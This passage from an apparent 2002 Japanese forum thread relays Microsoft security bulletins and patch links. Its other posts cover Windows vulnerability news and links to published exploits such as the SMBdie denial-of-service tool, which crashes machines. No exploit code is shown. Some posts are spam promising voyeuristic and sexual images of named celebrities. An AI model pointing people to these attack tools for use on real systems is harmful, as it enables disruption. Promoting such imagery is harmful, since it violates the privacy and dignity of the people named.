この問題を悪用し、自分が選択したコードをハンドラとして指定し、さらに、
そのコードを NCM から呼び出させるために、ネットワーク接続を確立する
可能性があります。コードはシステム権限で実行されます。

・ Microsoft Windows 2000:
- PC/AT 互換機用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=41413
ダウンロード先のリストから Japanese を選択してください。
- NEC PC-9800シリーズ用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=41414
ダウンロード先のリストから Japanese NEC を選択してください。

修正プログラムに関する追加情報
対象プラットフォーム :
この修正プログラムは Windows 2000 Service Pack 2 または Service Pack 3
を実行しているシステムにインストールすることができます。
この修正を含む予定のサービス パック :
この問題に対する修正プログラムは Windows 2000 Service Pack 4 に含まれる
予定です。
再起動の必要性 : あり
405名無しさん@お腹いっぱい。:02/08/16 23:40 ID:Baz7OFlp
↑ 既出
406■□■□■□■□■□:02/08/19 18:49 ID:???
ここまで読んで、インストール完了
by ひでと
407むむむ ◆MUMUMU4w :02/08/21 00:36 ID:ATF2KRZj
秘密情報を含まないCOOKIEに頼ったアクセス制御方式の脆弱性
− 偽COOKIE送信による任意ユーザへの成りすましの問題 −
http://securit.etl.go.jp/SecurIT/advisory/rawcookie/

高木浩光氏(産業技術総合研究所 グリッド研究センター セキュアプログラミング
チーム SecurIT)によるアドバイザリが公開されました。
408むむむ ◆MUMUMU4w :02/08/21 16:38 ID:Vtwk+QIG
■マイクロソフト、Office XP SP-2を公開

 マイクロソフト株式会社は21日、Office XPシリーズ用のアップデートプログラム
「Office XP Service Pack2(Office XP SP-2)」を同社ホームページで公開した。

 Office XP SP-2はSP-1以降のバグフィックスやセキュリティアップデートを含んだ
アップデートプログラム。対象となる製品はOffice XPシリーズのほか、Excel Version
2002などの単体製品も含まれる。プログラムサイズは約15.3MB。
(以上、2002年8月21日のPC Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/pc/docs/2002/0821/ms.htm
情報元: N+の依頼スレ: http://news2.2ch.net/test/read.cgi/newsplus/1029804368/352
409むむむ ◆MUMUMU4w :02/08/21 16:39 ID:Vtwk+QIG
>>408
ポインタを書き忘れ。スマソ。

□Office XP SP-2ダウンロードページ
http://www.microsoft.com/japan/office/downloads/xpsp2/
410むむむ ◆MUMUMU4w :02/08/21 20:24 ID:Wd82/2q4
■Winhlp32.exeにバッファオーバフローの脆弱性、Exploitコードが公開

Winhlp32.exe Buffer Overflow Exploit Code
http://www.securiteam.com/exploits/5IP0D0081G.html
411むむむ ◆MUMUMU4w :02/08/21 20:29 ID:Wd82/2q4
■マイクロソフトのFTMにセキュリティーホール (CNET Japan Tech News)

 米マイクロソフトは20日(米国時間)、製品テストや大口ライセンスプログラムなど、多数の
有料加入制プログラムのユーザーに警告を出した。ダウンロード時に利用するソフトウェア
に影響しうるセキュリティー不具合を発見したとしている。

 マイクロソフトは、『File Transfer Manager』(FTM)を利用している顧客に、最新バージョン
へのアップデートを懸命に呼びかけている。新バージョンは、6月末ごろにリリースされた
『FTM 4.0.0.72』だ。対象となる顧客は、マイクロソフトのFTM用ウェブサイトから新バージョン
をダウンロードできる。

 FTMは、マイクロソフトの一部のサービスで使用するソフトウェアを、自動的にダウンロード
する際に使うものだ。マイクロソフトでは、ベータ版テスター、大口ライセンスプログラムに
加入している企業、『マイクロソフト開発者ネットワーク』(MSDN)の会員などにFTMを配布
している。
(以上、2002年8月21日のCNET Japan Tech Newsより一部引用―全文は引用元を参照)

引用元: http://japan.cnet.com/Enterprise/News/2002/Item/020821-2.html?me
412むむむ ◆MUMUMU4w :02/08/21 20:30 ID:Wd82/2q4
■破壊力の強いトロイの木馬「Portacopo」の新種が発見

 アイ・ディフェンス・ジャパンからの情報によると、破壊力の強いトロイの木馬「Portacopo」
の新種が発見された。この新種は、ファイルのサイズは原種と同じ475,648バイトだが、
Portacopos.exe、portocop.exeというようにファイル名が異なる。ファイルのアイコンは、
中央が紫で白い線の縦長の四角形である。ファイル名は、ポルトガル語で「カップホルダー」
を意味し、ユーザーにコンピューターのCDトレイを開く害のないジョークプログラムであると
思わせる。しかしながら、実際には破壊力の強いトロイの木馬プログラムである。
(以上、2002年8月21日のYahoo!ニュースより一部引用―全文は引用元を参照)

引用元: http://headlines.yahoo.co.jp/hl?a=20020821-00000010-vgb-sci
413名無しさん@お腹いっぱい。:02/08/21 21:12 ID:xvR0z+FL
キムタク・静香自宅前で激写
http://www.unoworks.com/rank-deai/ranklink.cgi?id=arifish
タッキーのキャバクラ豪遊写真
http://www.uicupid.net/kir/cgi/rank/rank.cgi?mode=in&id=fish
アミのデートでキス写真
http://ninkirank.misty.ne.jp/06/enter.cgi?id=arifish
アユと長瀬のパコパコ写真
http://pakopako.misty.ne.jp/enter.cgiid=arifish
石川のオマンコ丸見え画像はココ
http://210.153.105.166/cgi-bin/rank/ranklink.cgi?id=fish
加護・高橋の超レアなブルマ写真
http://www.all-mode.net/jrank/in.php?id=arifish
これはどうだ安達・クロダ密会写真
http://210.153.105.166/cgi-bin/rank/ranklink.cgi?id=fish
414名無しさん@お腹いっぱい。:02/08/21 21:21 ID:OT0s21jj
>>413
なるほど、広告かと思ったけど、
それがウィルスなどをばら撒く注意するべきサイトってことだな?
415名無しさん@お腹いっぱい。:02/08/21 21:34 ID:TPG6GIdh
んなわけない
416名無しさん@お腹いっぱい。:02/08/21 21:51 ID:OT0s21jj
宣伝業者祭りにいかなくちゃ(w
417名無しさん@お腹いっぱい。:02/08/22 15:40 ID:???
XPだけど、みんなマメにアップデートしてる?
もう面倒くさくなってしまった。
418kng ◆itdn3QI6 :02/08/22 16:02 ID:???

このニュースレターの購読の停止や、マイクロソフトホームページの
プロファイルセンターで購読されているニュースレターの購読を
すべて停止したい方は、このニュースレターの最後にある説明をお読みください。
=====================================================
このニュースレターでは、セキュリティ情報をいち早くお知らせするために、
要約情報という形式でご案内いたします。
このセキュリティ情報の詳細につきましては、現在準備中です。
=====================================================
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-044ov.asp


MS02-044 に関する情報
「MS02-044: Office Web Components に安全でない機能が含まれる (Q328130)」
に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。


概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーによりお客様のコンピュータ上で任意のプログラムを実行される可能性
があります。


対象となる製品
==============
・ Office Web Components 2000
・ Office Web Components 2002

Office Web Components は、 以下の製品に含まれています。

・ Microsoft BackOffice Server 2000
・ Microsoft BackOffice Server 2002
・ Microsoft BizTalk Server 2000
・ Microsoft BizTalk Server 2002
・ Microsoft Commerce Server 2000
・ Microsoft Commerce Server 2002
・ Microsoft Internet Acceleration and Security Server 2000
・ Microsoft Office 2000
・ Microsoft Office XP
・ Microsoft Project 2002
・ Microsoft Project Server 2002
・ Microsoft Small Business Server 2000

(続く)
419kng ◆itdn3QI6 :02/08/22 16:04 ID:???
420名無しさん@お腹いっぱい。:02/08/22 16:06 ID:???
・ Microsoft Office XP
http://download.microsoft.com/download/OfficeXPProf/Update/Owcupd/W98NT42KMeXP/JA/owcupd.exe

Office XP をご使用の場合は、この修正と過去のセキュリティ修正プログラム
を全て含む、Office XP Service Pack 2
http://www.microsoft.com/japan/office/downloads/xpsp2/default.asp
の適用を強くお勧めいたします。
Office XP Service Pack 2 を適用した場合、この修正プログラムの適用は必要
ありません。

上述の修正プログラムは、下記の Microsoft Project 2002 および Microsoft
Project Server 2002 以外すべて共通の修正プログラムです。

・ Microsoft Project Server 2002
注意: Microsoft Project Server 2002専用の修正プログラムです。 Microsoft
Project 2002 をご使用の場合は、専用の修正プログラムを適用してください。

Microsoft Project Server 2002 の問題を修正するプログラムは現在準備中です。
公開され次第、このページでご案内します。

・ Microsoft Project 2002
http://download.microsoft.com/download/msftproject2002/prj1001/10/WIN98MeXP/EN-US/prj1001.exe

注意: Microsoft Project 2002専用の修正プログラムです。Microsoft Project
Server 2002 をご使用の場合は、専用の修正プログラムを適用してください。


詳細
====

-- 略 --

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。

MS02-044: Unsafe Functions in Office Web Components (Q328130)
http://www.microsoft.com/technet/security/bulletin/MS02-044.asp

(終わり)
421むむむ ◆MUMUMU4w :02/08/22 16:22 ID:XnXSXlrz
>>418-420
乙です。
422名無しさん@お腹いっぱい。:02/08/22 17:03 ID:???
ナローバンドなんでめんどくさい罠
423名無しさん@お腹いっぱい。:02/08/22 20:24 ID:???
>>422
同意。
OfficeXP SP1なんか60MBくらい無かった?
30MBが限度だな。Irvineつかって一週間くらいかけた門(w

電話もつなげねーし。
ADSLは遠すぎて多分無理だし。
ISDNくらいは入ったほうがいいかな・・・。

あれはいただけないな。
CD\1kだして買おうかな。
424むむむ ◆MUMUMU4w :02/08/23 11:25 ID:vQ8nka0W
■WindowsNT4/2000/XPのネットワークにDoS攻撃を受ける脆弱性(MS02-045)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-045ov.asp

MS02-045 に関する情報
「MS02-045: ネットワーク共有プロバイダの未チェックのバッファにより、
サービス拒否が起こる (Q326830)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、ネットワーク共有プロバイダに含まれる未チェックのバッファ
により、お客様のコンピュータが STOP エラーにより停止する可能性がある
問題です。最悪の場合、悪意のあるユーザーによりお客様のコンピュータが
提供している全てのサービスを妨害される可能性があります。

対象となる製品
==============
・ Microsoft Windows NT 4.0 Workstation
・ Microsoft Windows NT 4.0 Server
・ Microsoft Windows NT 4.0 Terminal Sever Edition
・ Microsoft Windows 2000 Professional
・ Microsoft Windows 2000 Server
・ Microsoft Windows 2000 Advanced Server
・ Microsoft Windows XP Professional

(続く)
425むむむ ◆MUMUMU4w :02/08/23 11:25 ID:vQ8nka0W
426むむむ ◆MUMUMU4w :02/08/23 11:28 ID:vQ8nka0W
■TSAC ActiveXコントロールに脆弱性(MS02-046)
備考: MS02-047(次でアップします)も参照のこと

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-046ov.asp

MS02-046 に関する情報
「MS02-046: TSAC ActiveX コントロールのバッファ オーバーランにより、
コードが実行される (Q327521)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、悪意の
あるユーザーによりお客様のコンピュータ上で任意のプログラムを実行される
可能性があります。

対象となる製品
==============
・ Microsoft Terminal Services Advanced Client (TSAC)

Microsoft Terminal Services Advanced Client (TSAC) : ターミナル サービス
アドバンスト クライアントは、Internet Explorer 内で Terminal Services
を実行するために使う、Win32 ベースの ActiveX コントロール (COM オブジェ
クト) です。

詳細については、以下のサイトをご覧ください。
http://www.microsoft.com/japan/windows2000/news/bulletins/tsac.asp

修正プログラム
==============
・ Microsoft Terminal Services Advanced Client (TSAC)
http://download.microsoft.com/download/IE60/secpac28/6/W98NT42KMeXP/JA/q323759.exe

Internet Explorer 用の最新の累積的な修正プログラムを適用することによって
も本問題が解決されます。最新 Internet Explorer 用の累積的な修正プログラ
ムは、マイクロソフト セキュリティ情報 MS02-047 (概要情報) をご覧ください。
http://www.microsoft.com/japan/technet/security/bulletin/MS02-047.asp
427むむむ ◆MUMUMU4w :02/08/23 11:29 ID:vQ8nka0W
■Internet Explorerの6つのセキュリティホールを修正するパッチ (MS02-247)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-047ov.asp

MS02-047 に関する情報
「MS02-047: Internet Explorer 用の累積的な修正プログラム (Q323759)」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の
累積的な修正プログラム (Q321232) で修正された問題に加えて、
新たに 6 つの問題を排除します。

対象となる製品
==============
・ Internet Explorer 6
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.5 Service Pack 1
・ Internet Explorer 5.01 Service Pack 2
Windows 2000 に組み込まれているもののみ)
注意: Internet Explorer 5.01 Service Pack 2 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。

修正プログラム
==============
・ Internet Explorer 6
http://download.microsoft.com/download/IE60/p28_IE/6/W98NT42KMeXP/JA/q323759.exe
・ Internet Explorer 5.5 SP2 and Internet Tools
http://download.microsoft.com/download/ie55sp2/p28_IE/5.5_sp2/W98NT42KMe/JA/q323759.exe
・ Internet Explorer 5.5 SP1 and Internet Tools
http://download.microsoft.com/download/ie55sp1/p28_IE/5.5_sp1/W98NT42KMe/JA/q323759.exe
・ Internet Explorer 5.01 SP2
http://download.microsoft.com/download/ie501sp2/p28_IE/5.01_sp2/NT5/JA/q323759.exe
428むむむ ◆MUMUMU4w :02/08/23 11:30 ID:???
>>427
>■Internet Explorerの6つのセキュリティホールを修正するパッチ (MS02-247)

MS02-247 => MS02-047 です。スマソ。
429むむむ ◆MUMUMU4w :02/08/23 11:37 ID:???
>>427
ちなみに、その6つ。
・Gopher問題
・ActiveXの脆弱性 (MS02-046)
・HTMLディレクティブが不適切なためローカルファイルを盗まれる
・[ファイルのダウンロード]でダウンロード元の場所の表示方法に問題があった
・MS02-005 で修正した(はずの)問題が十分修正されていなかった
・ローカルHTMLリソースのCSS脆弱性の修正
430この話 出たか?:02/08/23 12:45 ID:???
http://headlines.yahoo.co.jp/hl?a=20020823-00000269-reu-bus_all
オフィス関連ソフトなどにセキュリティー上の重大な問題
431むむむ ◆MUMUMU4w :02/08/23 13:21 ID:???
>>430
>>418-420 のことでしょう。
432名無しさん@お腹いっぱい。:02/08/23 13:42 ID:???
Office Web Components に安全でない機能が含まれる (Q328130) (MS02-044)
登録日 : 2002/8/22
更新日 : 2002/8/22

概要 :
このセキュリティ情報の対象となるユーザー : Office Web Components を使用しているすべてのお客様。Office Web Components はスタンドアロン ダウンロードとして利用可能です。また、下記の一覧にあげられている MicrosoftR 製品の一部として含まれています。

脆弱性の影響 : 3 つの脆弱性が存在します。最も深刻な脆弱性で、攻撃者はユーザーのシステムでコマンドを実行する可能性があります。

最大深刻度 : 高

推奨する対応策 : これらの製品を使用しているお客様は直ちに適切な修正プログラムをインストールして下さい。

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-044.asp
433探してみリークだよ:02/08/23 15:10 ID:H8tJgGQb

吾郎ちゃん女優食べ過ぎでしょ隠し撮り4枚
http://www.simplelife.to/AR/rank2.cgi?id=1608ar5&click=21
城島・吉岡ショットバーで2ショット写真
http://www.simplelife.to/AR/rank.cgi?id=1608ar5c21
あややのオマンココラパート2
http://www.simplelife.to/AR/rank.cgi?id=1477ar26c24
ゴマキも出すの?放尿写真パート3
http://www.sakamoto-ryuichi.com/MB/DEAI/rank.cgi?click=6855DEAI
光一といっしょにいる女優K写真
http://www.sagisou.sakura.ne.jp/~ippi/himitu/rank/ranklink.cgi?id=fish
434名無しさん@お腹いっぱい。:02/08/23 15:56 ID:???
今日はたくさんあるな

むむむさん、ノ●カレードゾー
435IBMサービス部門社員:02/08/23 21:59 ID:???
WINDOWSha
moudamepo
436名無しさん@お腹いっぱい。:02/08/23 22:10 ID:4IylUdqF
WindowsXPの自動アップデートがうざい。
むかつく。
437名無しさん@お腹いっぱい。:02/08/24 00:01 ID:???
>>434
鼻糞に見える・・・・
438名無しさん@お腹いっぱい。:02/08/24 02:07 ID:???
>>436 じゃあ手動に切り替えればいいのに。
439初心者:02/08/24 05:30 ID:???
ttp://dailynews.yahoo.co.jp/fc/computer/ie_outlook/

どうすればいいんですか?
440名無しさん@お腹いっぱい。:02/08/24 08:26 ID:???
>>439 Windows Update をしてください。
441名無しさん@お腹いっぱい。:02/08/24 12:39 ID:???
MS02-047当ててからなんで、これが原因ぢゃねぇ?って思ってるん
だけど、google_cacheのページ保存でエラーが頻発するようになった。

例えばココとか↓
http://216.239.53.100/search?q=cache:UvSxTL7TuCUC:www.medscape.com/content/2002/00/43/66/436603/436603_ref.html+MS+Gates+foon&hl=ja&ie=UTF-8

w2kSP3 (5.00.2195)
IE5.01SP2 (5.00.3502.1000)

もう当てちまったんだが。。。
442441:02/08/24 14:29 ID:???
IE5.01
SP2×→SP3○
443いつも名無し ◆sageram2 :02/08/25 22:52 ID:???
インスト時にIEの設定を書き換える、とかあるのか?
当方WinMe,IE6.0。>441のキャッシュでエラーは出なかった
444441:02/08/26 12:03 ID:???
>>443
情報サンクス。w2kの同様の環境では再現性アリなのよん。

>インスト時にIEの設定を書き換える、とかあるのか?
無いけど、M$謹製のバグがfixされたり、新たに追加されたり
ってのはあるんではない?

実は以前のSRP1ではw2k環境に劇的な(藁)変化があったのよ。
http://www22.tok2.com/home/u2didso3sg/cgi-bin/wf/wforum.cgi?mode=allread&no=1515&page=0
↑参考リンク(ブラウザの『Donut』ファミリーでの話)

もしかしたら「異様に長いURL」ってのが問題なのかもしれないけど、
とりあえずMS02-047以降に「ページ保存のエラー」が頻発してるんで、
パッチ当てた結果の報告をしてみた。なんか情報のある方いればヨロシコ。
445むむむ ◆MUMUMU4w :02/08/29 11:58 ID:HXBwLqkx
■Windowsにデジタル証明書の利用を妨害される脆弱性(MS02-048)
  IEをはじめとするWindows全体に影響あり

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-048ov.asp

MS02-048 に関する情報
「MS02-048: Certificate Enrollment Control の問題により、
デジタル証明書が削除される (Q323172)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、Certificate Enrollment Control の問題により、
ローカルコンピュータに保存されている証明書が削除される可能性がある
問題です。最悪の場合、悪意のあるユーザーによりお客様のコンピュータで
証明書を利用するサービスが妨害される可能性があります。

対象となる製品
==============
・Microsoft Windows 98
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0 Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP

(続く)
446むむむ ◆MUMUMU4w :02/08/29 11:59 ID:HXBwLqkx
447 :02/08/29 12:15 ID:???
== 接続 - whois.nic.ad.jp ==

[ JPNIC & JPRS database provides information on network administration. Its ]
[ use is restricted to network administration purposes. For further infor- ]
[ mation, use 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, ]
[ add'/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Domain Information: [ドメイン情報]
a. [ドメイン名] EIKO-DO.CO.JP
e. [そしきめい] かぶしきがいしゃたなかえいこうどう
f. [組織名] 株式会社田中栄光堂
g. [Organization] TANAKA EIKO-DO CO.,LTD.
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] IS442JP
n. [技術連絡担当者] IS442JP
p. [ネームサーバ] ns1.odn.ne.jp
p. [ネームサーバ] ns3.odn.ne.jp
y. [通知アドレス] [email protected]
[状態] Connected (2003/04/30)
[登録年月日] 2000/04/12
[接続年月日] 2000/04/14
[最終更新] 2002/05/01 02:35:05 (JST)
[email protected]

== 終了 ==
448:02/08/29 14:51 ID:3lB5rjnX
なんかさ、LAN内部で誰がどのファイルをダウンロードしたかまで
追跡できるセキュリティーソフトの記事を最近みた記憶があるんだが、
検索しても出てこないわ、記憶も曖昧だわ、みつからんのじゃ。

履歴もたどってみたが、ないんじゃよ

誰か覚えてるかた、HPアドレスでもいいし、製品へのリンクでも良いし教えてくれないかのぅ?
449むむむ ◆MUMUMU4w :02/08/29 16:29 ID:HXBwLqkx
■セキュリティ・スタジアム2002

今年も開催される模様です。とりあえずFor Your Informationということで。
http://www.security-stadium.org/
450SMB の実装に問題 exploit:02/08/30 00:12 ID:???
SMB の実装に問題 exploit
ネットワーク共有プロバイダの未チェックのバッファにより、
サービス拒否が起こる (Q326830) (MS02-045)

Windows NT 4.0/2000/XP に弱点。SMB の実装に問題があり、
特殊なパケットを投げると OS をハングさせることができる。
詳細:http://marc.theaimsgroup.com/?l=bugtraq&m=103011556323184&w=2

patch があるので、これを適用すれば解決する。
exploit が公開されている。
SMBdie is a proof of concept tool which crashes Windows machines
with Netbios enabled by sending a specially crafted SMB request.
Tested against Windows NT/2k/XP/.NET RC1.
http://packetstorm.decepticons.org/0208-exploits/
http://packetstorm.decepticons.org/index.shtml
451名無しさん@お腹いっぱい。:02/08/30 01:01 ID:ENwXQSWz
>>445-447
このQ323172ってバージョン情報に書かれないんだけど・・・・
452むむむ ◆MUMUMU4w :02/08/30 02:11 ID:???
>>451
MS 的には IE の FIX ではなく、Windows システムの FIX だからでしょう。
453むむむ ◆MUMUMU4w :02/08/30 12:21 ID:J+5a0ySC
一応出しておきます。日本語版はいつだろう。

Windows XP SP1、間もなくリリース
http://www.zdnet.co.jp/news/0208/30/nebt_05.html
454名無しさん@お腹いっぱい。:02/08/30 12:45 ID:aFN1YfZC
M$のウェブページってどうして分かりにくく作られてるんだろうね。
サイアクダ
455名無しさん@お腹いっぱい。:02/08/30 15:31 ID:???
最新のwindows updateしたらホットゾヌが不正な処理で起動しなくなりますた
もうだめぽ
456名無しさん@お腹いっぱい。:02/08/30 22:30 ID:???
>451 Win Me,98,98SEならばqfecheck.exeでQ323172が表示されるぞ
457名無しさん@お腹いっぱい。:02/08/31 20:46 ID:???
>>456
qfecheck.exeで調べてみて、よく分からなかったんですが
どこで入手すればいいんでしょうか?
458名無しさん@お腹いっぱい。:02/08/31 21:08 ID:???
>457
スタート→ファイル名を指定して実行
459457:02/08/31 22:10 ID:???
>>458
ありがとうございます。

使用OSは98SEなんですが、W98欄に追加されていました。
多分大丈夫ですよね。
460名無しさん@お腹いっぱい。:02/08/31 23:29 ID:qOJShSqn
>>456
NTとか2kとかXPは?
461名無しさん@お腹いっぱい。:02/09/01 08:00 ID:mODKjUO0
>>460
XPだけかもしれないけど、、、プログラムの追加と削除。
462b:02/09/01 08:10 ID:TKLzbPh+
463名無しさん@お腹いっぱい。:02/09/01 10:03 ID:???
464:02/09/01 13:52 ID:lRGqyPeU
IBMのコンピューターとメビウス
どっちがお勧め??
465名無しさん@お腹いっぱい。:02/09/01 14:38 ID:UganNaLO
>>461
おおお!

ちゃんと出てたよ!サンクスコ
466451:02/09/01 19:18 ID:???
>>456
MEですがありますた
ありがとう!
467名無しさん@お腹いっぱい。:02/09/01 20:42 ID:UrdMlCEE
>>444
む。確かに長いURLを含むページは保存できない。
しかもアンインストールは当然のごとくできない・・・。

W2Kユーザでこの件に関しての情報、オイラも待ちます。


〜MS02-047(Q323759)の修正パッチ導入後、長いURLを
含むページがローカルに保存できない〜
468☆☆解読 リーク☆☆:02/09/01 21:03 ID:paIOqukh
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
加護ちゃんと慶太のデート?写真
http://www.uicupid.net/kir/cgi/rank/rank.cgi?mode=in&id=fish
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
香取○吾の女成田空港で盗撮成功写真
http://www.all-mode.net/jrank/in.php?id=arifish
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
ソニンのフジテ○ビでのトイレ盗撮写真
http://kindan.adultdeai.net/warikiri/ranklink.cgi?id=arifish
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
内田恭子アナもついでに盗撮
http://pakopako.misty.ne.jp/enter.cgi?id=arifish
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆
ゴマキと中居くん密会写真
http://www.fsc.x0.com/25h/deai/ranklink.cgi?id=arifish
469名無しさん@お腹いっぱい。:02/09/03 11:36 ID:???
Internet Explorer 用の累積的な修正プログラム (Q323759) (MS02-047)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047.asp
470469:02/09/03 11:41 ID:???
471むむむ ◆MUMUMU4w :02/09/03 14:41 ID:???
>>469-470>>427 にて。
472469:02/09/03 17:03 ID:???
>471 失礼!日本語版KBが公開されただけだった(^^;
473名無しさん@お腹いっぱい。:02/09/04 01:35 ID:???
age
474むむむ ◆MUMUMU4w :02/09/05 09:14 ID:mB1VsAwF
■Microsoft Visual FoxPro 6.0 にセキュリティホール(MS02-049)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-049ov.asp

MS02-049 に関する情報
「MS02-049: 警告なしで Web ページが Visual FoxPro 6.0 アプリケーションを
起動する (Q326568)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品の動作の設定を登録する問題により、不正な
プログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーによりお客様のコンピュータ上で任意のプログラムを実行される可能性
があります。

対象となる製品
==============
・ Microsoft Visual FoxPro 6.0

修正プログラム
==============
・ Microsoft Visual FoxPro 6.0
http://download.microsoft.com/download/vfox60/Patch/Q326568/WIN98MeXP/EN-US/vfp_q326568_en.exe

Microsoft Visual FoxPro 6.0 は英語版製品のみが提供されております。
そのため、日本語版修正プログラムはございません。
475むむむ ◆MUMUMU4w :02/09/05 11:49 ID:mB1VsAwF
■Polycom ViewStation(ビデオカンファレンス機器)に複数の脆弱性(ISS Alert)

情報元: http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21089

Windowsシステムに「直接」関係があるわけではないですが、Polycomはその筋で
かなり使われていて、広い範囲に影響ありそうなので、情報へのポインタを掲載して
おきます。

476219.96.219.219:02/09/05 13:14 ID:RW6zRwDr
            ./'"" : .:.. .::: . :. .::"=,
           /:. :..:..:::::::::::::::;;;:::;;;:::;:..:.:!,
           i:.:::::;;;;;:::::-,:-'"    ;:::::::i,
           ノ:::"   ヽ,..     ;:::::::i,
           ,i::::. ,....,,,_   ,;;;;;;::::,,,,,.;:::;i..,
           ヽ;::,;:- ;:;;::,ー:;"/ /  i"`:;":l,
           ;"!,:!, "''''"ノ: .ヽ---'" :l,,,/
            !, ;!,"""~::.,....::,:    .:l'          人生ってせつねーな
             'l;  ,//l,l,l,l,ll::  .;l 
              ヽ, "~---'"  ,;/!ヽ, 
               ヽ,,    /;;;" ヽ,,,,,,,
       ,,,,,,::---''''''''''''"!,i,"''''''''''"/   /::" "'--::;;,
     /";,    :::ヽ,   l,!,/=l;"~,/   /:   :;--''"'ヽ,
     (;;;;,,ヾ,   ;::: .   l/,,,.l,/  ,/;' ' :',,..:'      :ヽ
     ,ノ ::;;,,,::i,   :, ::,   i,./   /  .: ,:''   _,,.,-'l;:..   ,i
     ,):::::.... "";,  :,,:;   /   ,/.;;;;;, _,,;:-''''".,,;,:-"::...  l
477:02/09/05 14:08 ID:9oQLi/1C
>>448

おい、おめぇら、なんで誰も教えてくれやがらねぇんだYO!!
外部からの浸食されるのばかりに気を遣ってる香具師は逝って良し!!
内部からっつーか背中に気を付けろ!!

って2ch語の質問じゃないと教えてくれないのかYO!!

と、言ってみるテスト

そうすると煽りばかりのレスしか付かない罠
478名無しさん@お腹いっぱい。:02/09/05 15:22 ID:???
>>477
だってここ質問スレッドじゃないし
479名無しさん@お腹いっぱい。:02/09/05 20:19 ID:???
>>477
「こんなソフトありませんか?」スレッドVol.12
http://pc3.2ch.net/test/read.cgi/win/1026219714/
480名無しさん@お腹いっぱい。:02/09/05 20:46 ID:???
証明書確認の問題により、ID が偽装される (Q328145) (MS02-050)

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-050.asp

登録日 : 2002/9/5
更新日 : 2002/9/5

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Windows、Office for Mac、Internet Explorer for Mac または Outlook Express for Mac を使用しているお客様

脆弱性の影響 : ID の偽装

最大深刻度 : 高

推奨する対応策 : 管理者は修正プログラムを直ちにインストールして下さい。

影響を受けるソフトウェア :


Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Me
Microsoft Windows NTR 4.0
Microsoft Windows NT 4.0, Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Office v.X for Mac
Microsoft Office 2001 for Mac
Microsoft Office 98 for Macintosh Edition
Microsoft Internet Explorer for Mac
Microsoft Outlook Express for Mac
481名無しさん@お腹いっぱい。:02/09/06 00:08 ID:???
>>480
証明書確認の問題により、

ID が偽装される (Q328145) (MS02-050)について捕捉


============================================================
以下の製品に関する修正プログラムは現在準備中です。
公開され次第、このページでご案内します。

Microsoft Windows 98
Windows 98 Second Edition
Windows Me
Windows 2000
Windows XP 64 bit Edition
Microsoft Office v.X for Mac
Microsoft Office 2001 for Mac
Microsoft Office 98 for Macintosh Edition
Microsoft Internet Explorer for Mac (for OS 8.1 to 9.x)
Microsoft Internet Explorer for Mac (for OS X)
Microsoft Outlook Express for Mac


============================================================
482むむむ ◆MUMUMU4w :02/09/06 00:08 ID:phlEuKkC
>>480
どもです。今出張先から戻りました。詳細を貼っておきます。

■Windows98/Me/NT4/2000/XPに証明書のIDが偽装される「危険度高」の
 セキュリティホール(MS02-050)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050ov.asp

MS02-050 に関する情報
「MS02-050: 証明書確認の問題により、ID が偽装される (Q328145)」に関する
要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、証明書の基本制約拡張が適切に確認されないために、 CA
(Certificate Authority: 証明機関)証明書として使用できない証明書で
